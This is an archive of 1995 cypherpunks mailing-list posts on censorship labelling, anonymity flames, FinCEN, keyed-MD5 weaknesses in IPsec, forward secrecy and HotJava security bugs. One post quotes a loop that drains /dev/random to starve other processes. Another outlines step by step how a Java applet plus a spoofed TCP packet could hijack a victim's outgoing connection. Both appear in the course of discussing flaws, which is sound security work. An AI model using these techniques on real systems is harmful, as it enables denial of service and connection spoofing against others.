From: futplex@pseudonym.com (Futplex)
Date: Wed, 1 Nov 1995 14:31:50 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: W3 Self-Regulation?
In-Reply-To: <Pine.SOL.3.91.951031205913.1396A-100000@chivalry>
Message-ID: <199511010617.BAA05450@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


DDT writes:
# [Where's Tipper when you need her? Answer:]

Simon writes:
> Hey! Lay off the divine Ms. G!

Urgh. If I believed in a Hell, I'd expect the Parents Music Resource Center
to have its HQ there.

> There's actually a big difference between labelling and censorship, 

Agreed, to the extent that providers are not required to label their
products/services. But to my mind, the PICS software crosses the line between
labelling and censorship. In particular, it is a tool with which parents will
censor what their children encounter. 

Before Nathan Zook levels me, (hi :) let me elaborate. Such censorship seems
to be inevitable/necessary given the relationship between parents and their
children in our society. Parents are largely held liable for their
childrens' actions, while children generally are not responsible for their 
own actions. I believe this arrangement is unfair, but until/unless it
changes, parents must be given certain powers over those for whose actions 
they may be held liable.

We've hashed over this stuff several times before, so I'm not sure how much
sense it makes to reiterate it.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 4 Nov 1995 04:04:01 +0800
To: cypherpunks@toad.com
Subject: IBM's Microkernal
Message-ID: <199511010122.CAA29490@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


The Wall Street Journal, October 31, 1995, p. B6. 


IBM Announces New Software Code That Is Universal

By Laurie Hays


International Business Machines Corp., in its effort to reduce
the importance of computer-operating systems, announced a new
kind of universal-software code called Microkernal that
enables software to work on incompatible hardware.

For software developers and businesses that want to develop
one set of codes to run applications on many different
machines, Microkernal offers an opportunity for the
long-touted open computing. A big challenge remains, however:
to market the technology and make a business case for software
developers to write for Microkernal in a world that is
dominated by Intel Corp. and Microsoft Corp.

"It's exciting technology, but it will be hard for them to
market," says Dan Kuznetsky, an analyst with International
Data Corp., a Framingham, Mass., market-research firm. "It's
also got a long way to go from what they've announced to the
future."

Mr. Kuznetsky likens the technology to the development of a
great automobile transmission that has yet to be turned into
a truck or a car.

The key to Microkernal is a single source code base that
communicates between the hardware and the operating system.
One long-term possibility, for example, would be to make the
Apple Computer Inc.'s Maclntosh operating system work on an
Intel PC, impossible today because the two have different
design architectures that don't talk to each other.

IBM's delayed OS/2 operating system for the PowerPC chip,
which is expected to be shipped by the end of the year, will
be the first IBM offering for the Microkernal allowing
developers to move applications to the chip with only small
changes.

IBM so far has garnered a number of licensing agreements for
Microkernal, including Digital Equipment Corp., Maynard,
Mass., and LG Electronics, formerly the Korean electronics
concern Goldstar, as well as a number of universities.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 1 Nov 1995 18:35:42 +0800
To: anon-remailer@utopia.hacktic.nl (Anonymous)
Subject: Re: "Dr." Fred
In-Reply-To: <199511010235.DAA00908@utopia.hacktic.nl>
Message-ID: <9511011022.AA08641@all.net>
MIME-Version: 1.0
Content-Type: text


> The most charitable explanation for "Dr." Fred is that
> he's degenerated into the professional equivalent of
> those pathetic aging former chess masters who try to
> eek out a subsistence living by charging five bucks a
> game. People often play with them out of sympathy, or
> for the novelty of having lost to a past great. It's
> part of the chess culture, and it's basically harmless
> and sort of quaint.

Most of then could still beat your chess game.

> The difference, of course, is that its almost impossible
> to have sympathy for Dr. Fred. His hustle is for a hell
> of a lot more than subsistence. He was also never actually
> a master of his field, a fact that becomes increasingly
> obvious as our exposure to him goes on. Now he's reduced
> himself to trying to collect someone else's winnings.

Sour grapes, and from an anonymous poster too.  Oooo - I'm insulted.

I have been thinking about the issues of anonymity for some time, and I
have been convinced for some time that you can't have both integrity and
anonymity.  I thought there might be ways to accomplish this, but the
cypherpunks have convinced me it isn't true.  Show some integrity and
tell us who you are.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 1 Nov 1995 13:18:18 +0800
To: cypherpunks@toad.com
Subject: Re: From Bill Frezza: Electronic Warfare
Message-ID: <199511010500.GAA03716@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Oct 1995, Bill Frezza <frezza@interramp.com> wrote:

> Attached is a column that will appear on the op-ed page of tomorrow's
> (10/30) Communications Week that was stimulated largely by a report filed

> Cypherpunks mailing list (majordomo@toad.com) you can get some excellent

list address is cypherpunks@toad.com
list manager is majordomo@toad.com
sending list mail to majordomo will not work

> cyberspace.  Heightened conflict is inevitable.  Expect the rhetoric to get
> a lot hotter as the government spinmeisters labor to keep us focused on
> public enemies while frantically trying to keep its hand in every citizens
> pocket and its eyes on every bankbook.

the entire issue is not tied to money
the gummint is not just looking for more money

can't anyone from the media get it right

better story than w$j can make though
congratulations you're more clueful than the average media stooge






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 1 Nov 1995 23:39:19 +0800
To: cypherpunks@toad.com
Subject: US government department for crime enforcement!
Message-ID: <199511011440.GAA23008@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


It's come to my attention that the US government has a group
called the 'Department of the Treasury Financial Crimes 
Enforcement Network' in Vienna, Virginia.

I know that burocrats like to keep themselves busy, but even 
I didn't think they would go so far as to enforce crimes to 
keep the law enforcement people busy.

What a curious way to spend the taxpayers money.

Garfield

P.S. :-) for the humor impaired.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Wed, 1 Nov 1995 14:34:59 +0800
To: shields@tembel.org (Michael Shields)
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
Message-ID: <199511010614.IAA08682@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


> In article <199510311715.TAA05821@grumble.grondar.za>,
> Mark Murray <mark@grondar.za> wrote:
> > forever {
> > 	cat /dev/random > /dev/null
> > }
> > 
> > Severely limiting most decent folk's chance at getting PGP to work.
> 
> Ideally, if two processes are trying to read /dev/random at the same time,
> both would get data at half-speed.  Doesn't it work that way already?

Ideally, yes. However most processes won't swamp (and deplete) /dev/random
like this will. Most (well-behaved) processes will (should) just take what
they need. The above loop tries quite hard to take all that is there,
so any process asking for randomness will be sharing with the above loop
on an almost byte-by-byte basis, like you suggest.

The above won't leave a "pool of randomness" to act as a buffer for user
requests, so will cause a nasty slowdown.

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Thu, 2 Nov 1995 00:13:30 +0800
To: cypherpunks@toad.com
Subject: Re: Please send cash
Message-ID: <v02110100acbd41b59c95@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


Yo Fred, nobody said you wer not right on the money, just that these issues
clearly have fixes and are part and parcel to a pre-adolesencent product,
not a mature one.

Yes, you get two points for posting the bug report, but lose one for
soap-boxing about the woes of the product in general... Keep up the good
work, just drop the proslitizing and we all wouldn't mind hearing your rap.


BTW - If your or your friends are up for a game of speed-chess... I'm
willing, I used to be *rated* until I dropped off the circuit a few years
ago... Winged Benoni, Classical Ruy, or maybe an Accellerated Dragon (for
those who play the black)... I won't even charge you the nominal 5$ fee...

>I just picked this up from the Risks forum:
>
>> Date: Mon, 30 Oct 1995 16:14:59 -0500
>> From: Drew Dean <ddean@CS.Princeton.EDU>
>> Subject: HotJava 1.0 alpha 3 security issues
>>
>> We have found several security problems in the 1.0 alpha 3 release of
>> HotJava from Sun Microsystems.  The two most important problems are that
>> HotJava does not enforce the stated limits on where an applet can connect to
>> (an applet can talk to any place with which you have IP-level connectivity),
>> and HotJava is vulnerable to a man-in-the-middle attack, where someone can
>> watch your web-surfing, both seeing your requests, and the content that you
>> receive.
>
>Two of the Java attacks I outlined in this forum and got abuse for.
>
>> While HotJava prevents applets from actively opening connections that
>> violate the user-selected security policy, it allows an applet to accept
>> connections from anywhere.  At this point, an applet only has to use any one
>> of a number of channels to communicate where it is, and have the remote end
>> do the active open.
>>
>> HotJava also allows an applet to set the proxy servers that the browser
>> uses.  This opens up a huge hole for anyone concerned about the privacy of
>> their web surfing.
>
>Attacks 31-49 work here.
>
>> Please note that these bugs are specific to the 1.0 alpha 3 release, and are
>> _not_ bugs in the Java language itself, nor do they apply to Netscape 2.0
>> beta 1J, which doesn't permit network connections.  We have notified Sun of
>> these problems, and are presently writing a paper on these and other issues.
>> We will make more information available on our Web page after we hear back
>> from Sun.
>
>Drat - Sun doesn't offer awards.
>
>>
>>     http://www.cs.princeton.edu/~ddean/java/
>>
>> Drew Dean                             Dan Wallach
>> ddean@cs.princeton.edu                        dwallach@cs.princeton.edu
>
>Inquiring minds want to know.
>
>--
>-> See: Info-Sec Heaven at URL http://all.net
>Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com

(415) 324-4318


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 1 Nov 1995 22:15:13 +0800
To: cypherpunks@toad.com
Subject: OH?_bob
Message-ID: <199511011354.IAA27676@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-1-95. NYPaper, Page One lead:


   "C.I.A. Tells Panel It Failed To Sift Spy Data.
   Disinformation May Have Led to Spending for Illusionary
   Perils."

      The C.I.A. admitted today that it knowingly gave the
      White House and the Pentagon inside information on the
      Soviet Union without warning that it came from foreign
      agents it knew or strongly suspected were controlled by
      Moscow. The information may have affected decisions to
      spend billions of dollars on military hardware. Even
      when the agency knew or suspected that its sources were
      double agents it never warned that its inside
      information was tainted. The agency thought it more
      important to protect its suspect Soviet sources than to
      tell the nation's leaders the truth. That disclosure
      threatens the C.I.A.'s foundation; its central mission
      is to speak the truth to those in power. "Something has
      gone terribly wrong," Senator Bob Kerrey said.


   OH?_bob  (8 kb)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Thu, 2 Nov 1995 00:42:28 +0800
To: dan.schutzer@citibank.com
Subject: Re: Please send cash
Message-ID: <v02110102acbd48783387@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


>> While HotJava prevents applets from actively opening connections that
>> violate the user-selected security policy, it allows an applet to accept
>> connections from anywhere.  At this point, an applet only has to use any one
>> of a number of channels to communicate where it is, and have the remote end
>> do the active open.
>
>What if I start a Java applet then send it a faked TCP/IP packet from another
>host? Can I hotwire an outgoing connection that appears to be from the victim
>host?
>
>TCP/IP connections are not really all that directed. It is only the startup
>phase that is trully directed - someone has to start a conversation.
>
>Planned sequence of events :
>
>Mallet:
>        Send out Java applet to Alice
>        Send Bob a connection request packet on port 22
>        Alice's Java applet is accepting connections.
>        Send Alice a "request" packet claiming to come from port 22
>        Should now have an outgoing connection.
>
>???? I'm not a TCP/IP hacker (much). I'll ask our guru tommorow after we
>are done with the NSA.
>
>
>                Phill


For the most part this scenario would work. The Java Applett that is doing
secure or authenticated work clearly must employ some form of embedded
authenticatation.

A cute trick we are employing in one applet under development here at LGT
is an embedded stream based bi-directional encryption engine. It provides a
direct mechanism to encrypt the data stream within the TCP datagram rather
than outside of it. Since the datagram itself is untouched the simple
interface that Java employs is unfettered. However this proces adds some
performance overhead but allows for a virtual private network to be
constructed directly from the server to the applet context.

This project/concept will be released sometime in January along with some
underpinnings to plug into the FSTC EPayment Handler and its Architecture
along with the applett itself... Yes we will share it with the
CypherPunks... It's the best way I know to get a public testing/err bashing
and beta cycle on a concept.,

We really are not trying to build a product in this effort, rather the
intent  is to prove that although the general "external transport" is/may
be unsecured, that the internal or upper layers do not necessarily suffer
from the same security leakage or process models, and that secure
transactions can successfully be layered upon these "existing"
underpinnings if they are adapted properly.

This is especially true with both HiJacking and Spoofing attack modalities.
But in our model with the upper layers events are synchronized and
validated such that there is little chance for these attack modalities to
succeed.

Again for the world to hear - The Java concept is a Transport Harness, not
the entire magilla. Clearly that is what is going on here... Without thewse
upper layers it is no safer than normal netscape or any other browser
transport.

Sincereley,

Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com

(415) 324-4318


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Thu, 2 Nov 1995 12:29:40 +0800
To: baldwin@RSA.COM (Robert W. Baldwin)
Subject: Re: Keyed-MD5, and HTTP-NG
Message-ID: <9510018152.AA815244951@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry,
        I wish that the field of cryptography was as well advanced
as the field of Bridge Building.  A modern Bridge Builder can design
a bridge that is easy to construct and will in fact last for 100 years.
Unfortunately, modern Cryptography is like Bridge Building in the
late 1800s.  Back then, it was possible to build bridges that did
last for 100 years but lots of cities refused to pay the extra costs
in materials, labor and time to make a solid bridge, and as a result
the bridges did not last.  To make it worse, there was no systematic
teaching of the best practices, so often no one would realize that
they had build and/or bought a weak bridge until the day that it
fell apart.
        The sad result of the state of the art in Cryptography is
that we end up with situations like the one you described where it
takes months to get agreement among Cryptographers and then it turns
out that one of the other choices would have been better.  Not
surprisingly, the other choices often run slower than the initial choice.
However, there is little guarantee that the second choice will resist
all new attacks.  One of the reasons that the IPsec authenticator was
analyzed was that it had been chosen as the IPsec authenticator.  As soon
as a large organization picks a new authenticator, the researchers will
try their hand on breaking that one.  In the field of Cryptographic
Engineering, we just don't have a well tested construct for authenticators.
        If the IPsec group was run by scientists instead of engineers,
then they would consider cryptographic constructs that have "provable"
security properties (e.g., faking this authenticator is as hard as
factoring a Blum integer (a composite number with two strong primes)).
The downside of having this kind of provable security is that the
packet processing time would be enormous.  You would loose all the
benefits of a T1 connection to the Internet in order to get provable
security on your authenticator or encryptor.  Speaking for myself,
I am glad that the IETF is run by engineers.

        The vitriol you spewed is quite justified.  People at RSA and
IBM both agreed that the IPsec authenticator would resist all known
attacks.  In fact, a fully conforment IPsec implementation will still
resist the new attack because IPsec requires that the all keys be
changed every 2**32 packets.  However, this new attack makes Cryptographers
nervous.  Perhaps it could be extended to work with only 2**40 chosen packets
in which case there is a noticeable chance of it succeeding with only
2**32 packets.  Only further research will tell.  Currently, the only way
to get the MD5 key is to feed in 2**60 chosen messages of various lengths.
Of course, this is another good reason to use different keys for the
MD5 authenticator and packet encryption.  Wisely, IPsec requires different
keys for the authenticator and the encryptor.
        I also understand your being upset about not hearing about this
attack the moment it was published.  Actually, as soon as RSA Labs confirmed
the weakness we did call some of the editors of the IPsec specifications
to let them know about it.  The consensus was that this was not a show
stopper.  The IPsec protocols could be rolled out as is.  Later, once a
better authenticator had been developed and tested, it could be
substituted for the existing one.  One of the excellent features of the
IPsec specification is that new algorithms can be substituted easily
(modulo a "small matter of programming").
        Perhaps your main complaint is that it took time for the attack
to be confirmed by other researchers before the issue was brought to
the IPsec authors.  That is another effect of the current state of the
art in Cryptography, and an effect of the normal academic process.
It takes time to understand and confirm a weakness, and it is necessary
to confirm weaknesses (researchers make mistakes in designing attacks
just like they make mistakes in designing ciphers).  That's the way
things are in "cryptography today".

        I guess my conclusion is to say "Sorry".  Several professional
cryptographers gave it their best shot, and the authenticator turned
out to be somewhat weaker than expected.
                --Bob


______________________________ Reply Separator _________________________________
Subject: Re: Keyed-MD5, and HTTP-NG 
Author:  perry@piermont.com at INTERNET
Date:    10/31/95 5:25 PM

"baldwin" writes:
> Simon,
>         There are a few different ways to add key material to MD5 to
> make it suitable as a shared-secret authenticator function.  Some of these 
> are less resistant to attacks than others.  For example, the keyed MD5
> mechanism that is part of the current IPsec specifications can be
> attacked using 2**60 chosen messages.  Fortunately, the IPsec specs
> also require that the shared MD5 key be changed every 2**32 messages, 
> so this attack is unlikely to succeed.  Specifically, IPsec uses
> MD5 as follows:  X = MD5(key | keypad | Message), where "|" means 
> concatenation and the "keypad" pads out the key to 512 bits.
> Basically, this function is the same as standard MD5 with a
> different initialization vector for the compression operation 
> on the first block of the message.
>         RSA Labs recommends that a people use an authenticator like
> X = MD5(key1, MD5(key2, Message)).  This resists the chosen plaintext 
> attacks that were published at the crypto conference in Spring 1995.

Pardon me. The amount of vitriol I am going to spew is probably 
difficult for people to understand because most folks around here 
weren't following the keyed MD5 discussions during the IPSEC work and 
have no idea of the sort of crap the professional cryptographic 
community put us through.

We spent months, and months, and months, and months, getting advice 
from every cryptographer on the planet. Every conceivable combination 
of pads, multiple keys, keys before the text, after, before and after, 
etc., was discussed over and over and over again.

Finally, the folks at RSA and IBM both agreed that Hugo's scheme, the 
one we were putting in to place, was the best possible one. (Thats the 
one with the padded key.)

What the flying hell are you doing telling us now, and indeed not even 
telling the IPSEC community but instead mumbling on cypherpunks, that 
you guys were in possession of information BEFORE the entire 
discussion in midsummer that indicated that your own advice was wrong?

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 Nov 1995 22:25:17 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510312015.AA00768@zorch.w3.org>
Message-ID: <199511011359.IAA01892@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> 
> >A keyed version of MD5 is the base authentication mechanism in IPSP
> >and it has been heavily examined by a number of very good
> >cryptographers.
> 
> Yes we reviewed it and said that it sucked.
> 
> Phil wrote a note to Ron and Ron sent in a series of comments.

Phil was complaining largely because in spite of his apparent
cryptography credentials he's a lughead who can't have been bothered
to understand the architecture -- most of his comments reflected a
general ignorance of the process and of the discussions that had
preceeded. He also complained that the transforms weren't sufficiently
generic for his tastes. However, no complaints AT ALL were made about
Hugo's selection of cryptographic transform. We were assured by
everyone that it was the right thing to do, with people swearing up
and down that it was the appropriate idea. Do you want me to extract
the mailing list archives? Every last posting on this topic is on
line.

> The sequence of events I heard was that they asked Burt Kaliski for
> a suggestion, he gave them one and they chose something different.

Actually, Kaliski made an off-the-cuff suggestion that all the other
crypto folks ripped apart, largely because it was obvious even to me
how it could be attacked, and then he backed off.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Thu, 2 Nov 1995 02:20:14 +0800
To: cypherpunks@toad.com
Subject: Rivest on the Design of RC4
Message-ID: <9510018152.AA815247765@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Professor Ron Rivest will be presenting a talk titled
"The Design of RC4" at the RSA Data Security Conference in San Francisco
(January 17 to 19).  It should be interesting.
                --Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 2 Nov 1995 23:28:07 +0800
To: cypherpunks@toad.com
Subject: [cipher-request@itd.nrl.navy.mil: Electronic CIPHER, Issue 10, November 1, 1995, Postcard edition]
Message-ID: <9511011535.AA05757@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


Please pardon the forward -- but y'all might be interested in this
newsletter...

==============================================================================
Date: Wed, 1 Nov 95 10:02:51 EST
From: <cipher-request@itd.nrl.navy.mil>
Reply-To: <cipher-request@itd.nrl.navy.mil>
To: <cipherdist@itd.nrl.navy.mil>
Subject:  Electronic CIPHER, Issue 10, November 1, 1995, Postcard edition

Dear Cipher Postcard subscriber,
The next issue of Cipher (EI#10, dated November 1, 1995)
is now available for downloading from the anonymous FTP site or from
the Archive on the Cipher Home Page.  This message includes only the 
table of contents and retrieval instructions. I will update the Web
pages as soon as I can.
Regards,
--Carl
====================================================================

       _/_/_/_/  _/_/_/  _/_/_/_/   _/    _/  _/_/_/_/  _/_/_/_/
      _/          _/    _/     _/  _/    _/  _/        _/     _/
     _/          _/    _/_/_/_/   _/_/_/_/  _/_/      _/_/_/_/
    _/          _/    _/         _/    _/  _/        _/   _/
   _/_/_/_/  _/_/_/  _/         _/    _/  _/_/_/_/  _/     _/

====================================================================
Newsletter of the IEEE Computer Society's TC on Security and Privacy
Electronic Issue 10       November 1, 1995     Carl Landwehr, Editor
                                        Hilarie Orman, Assoc. Editor
====================================================================
Contents:                                         [1550 lines total]
Letter from the Editor 
Security and Privacy News Briefs:                       
 o S&P '96 deadline approaches
 o LISTWATCH: WWW-Security --  by Mary Ellen Zurko
 o US Navy ship's computers penetrated during JWID '95
 o US medical records confidentiality act (S.1360) introduced
 o Microsoft security: printer/network flaws/fixes; 
                       application-level object reuse problem
 o Netscape security: bucks for break-ins
 o Separation (micro)kernel from IBM?
 o European Commission to propose cryptography policy
 o FIRST to re-form as nonprofit
 o RSA pushes for firewall security standard
Articles and Conference Reports:
 o NISS notes:
 o IFIP WG11.3 Conference on Database Security; summary by David Spooner
Calls for Papers: Many! 
Reader's guide to recent security and privacy literature 
 o Conference Papers
 o Journal and Newsletter articles 
Calendar
Who's Where: recent address changes
New Reports available via FTP and WWW
Interesting Links 
DSL subscription offer
How to join the TC on Security and Privacy
Publications for sale 
TC officers
Information for Subscribers and Contributors  
____________________________________________________________________
Retrieval instructions:
 There is an archive that includes each copy distributed so far, in ascii,
 in files you can download at URL
 http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/cipher-archive.html
 There is also an anonymous FTP server that contains the same files.
 To access the archive via anonymous FTP:
 1. ftp www.itd.nrl.navy.mil
 2. At prompt for ID, enter "anonymous"
 3. At prompt for password, enter your actual, full e-mail address
 4. Once you are logged in, change to the Cipher Directory:
    cd pub/cipher
 5. Now you can request any of the files containing Cipher issues in ascii.
    Issues are named in the form: EI#N.9506  where N is the number of the
    issue desired and 9506 captures the year and month it first appeared.
=======end of Electronic Cipher Issue #10, 1 November 1995================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 3 Nov 1995 03:42:06 +0800
To: cypherpunks@toad.com
Subject: Re: US government department for crime enforcement!
Message-ID: <acbcf81e00021004a02a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:40 PM 11/1/95, anonymous-remailer@shell.portal.com wrote:
>It's come to my attention that the US government has a group
>called the 'Department of the Treasury Financial Crimes
>Enforcement Network' in Vienna, Virginia.
>
>I know that burocrats like to keep themselves busy, but even
>I didn't think they would go so far as to enforce crimes to
>keep the law enforcement people busy.
>
>What a curious way to spend the taxpayers money.

The Financial Crimes Enforcement Network, FinCEN, is well known to readers
of this list. If you grep for it in my Cyphernomicon FAQ, you should find
references in several places. I first learned of it in 1990, and have
followed it as best I can since. Not too much has been published about it.

It's an interagency working group, with participation by Treasury, State,
FBI, CIA, IRS, Justice, etc.

A good overview of it was in an early issue of "Wired," and is likely
available at the HotWired Web site.

FinCEN's Web page is:

http://www.ustreas.gov/treasury/bureaus/fincen/fincen.html


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 3 Nov 1995 17:52:17 +0800
To: cypherpunks@toad.com
Subject: Hit-and-Run Anonymous Posts (Re: "Dr." Fred)
Message-ID: <acbcfb6801021004664c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:22 AM 11/1/95, Dr. Frederick B. Cohen wrote:

(quoting an anonymous poster)

>> The difference, of course, is that its almost impossible
>> to have sympathy for Dr. Fred. His hustle is for a hell
>> of a lot more than subsistence. He was also never actually
>> a master of his field, a fact that becomes increasingly
>> obvious as our exposure to him goes on. Now he's reduced
>> himself to trying to collect someone else's winnings.
>
>Sour grapes, and from an anonymous poster too.  Oooo - I'm insulted.
>
>I have been thinking about the issues of anonymity for some time, and I
>have been convinced for some time that you can't have both integrity and
>anonymity.  I thought there might be ways to accomplish this, but the
>cypherpunks have convinced me it isn't true.  Show some integrity and
>tell us who you are.

I've also found that anonymous persons are usually the most prone to
hit-and-run attacks and flames. I usually only briefly scan anonymous posts
and then delete them. Some people hide behind anonymity to launch
scurrilous attacks. Best to just ignore them, in my opinion.

Exceptions are the cases when an anonymous source has something "sensitive"
to contribute, such as the release of the putative MD4 code, and the like.

And there have of course been thoughtful anonymous essays.

Anonymity is under some assault today. I think it important not to throw
out the very basic advantages of allowing anonymity just because some abuse
occurs. (The issue is not that "allowing" it is good, but that "banning" it
would require drastic and draconian enforcement measures.)

Pseudonyms are another matter entirely. Some are classy (Pr0duct Cypher,
Black Unicorn, Lucky Green), some are oafish (S Boxx), some are ephemeral.
Persistence of the identity, as when backed by digital signatures, is
important. (Though not essential, yet.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 2 Nov 1995 11:43:17 +0800
To: cypherpunks@toad.com
Subject: Hit-and-Run Anonymous Posts (Re: "Dr." Fred)
Message-ID: <acbcfdc702021004f4bd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Before someone corrects me:

I wrote:

"Exceptions are the cases when an anonymous source has something
"sensitive" to contribute, such as the release of the putative MD4 code,
and the like."

MD or RC4, I forget which it was. My point is that anonymity has been used
to post stuff like this (putatively), and that this is a "good" use of
anonymity. Good in the sense of being non-flamish, non-infantile.

(Not everyone thinks using anonymous posts to "liberate" intellectual
property is a "good" thing, but then I'm sure a lot of people don't think
it's good that the secrets of how to fix plumbing are written up in books
for all to read.)

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 2 Nov 1995 01:06:05 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Perfect Forward Secrecy - is it worth it?
In-Reply-To: <Pine.SOL.3.91.951031141506.1151H-100000@chivalry>
Message-ID: <199511011619.LAA01986@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Simon Spero writes:
> Quick survey; how important is perfect forward secrecy to you?

Very. It makes one's life far easier. It makes protecting historical
traffic easy. Its a wonderful feature for a cryptosystem.

> In general, schemes offering PFS require a extra PK-op, and an extra 
> round-trip when compared to  non-PFS schemes. This cost is incurred once 
> per "session", but can add on the order of seconds to startup times. 

Well, things aren't that bad if you use eliptic curve variants on D-H,
or if you are very careful. See Phil Karn's work on this for Photuris...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Thu, 2 Nov 1995 10:59:04 +0800
To: cypherpunks@toad.com
Subject: Re: [FRED] Anonymity and Integrity
In-Reply-To: <199511011907.OAA16631@opine.cs.umass.edu>
Message-ID: <199511011930.LAA28734@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> My turn to rise to the bait...
> 
> Dr. Frederick B. Cohen writes:
> > I have been thinking about the issues of anonymity for some time, and I
> > have been convinced for some time that you can't have both integrity and
> > anonymity.  
> 
> What's your working definition of "integrity" in this context ?

Come on.. we're never gonna get Dr. Fred to go away if we keep giving
him attention.

Christopher





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Thu, 2 Nov 1995 02:29:09 +0800
To: John Gilmore <gnu@toad.com>
Subject: Re: [ADMIN] Re: Welcome to cypherpunks
In-Reply-To: <9510260118.AA07260@toad.com>
Message-ID: <Pine.SUN.3.91.951101122248.25318F-100000@amanda.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


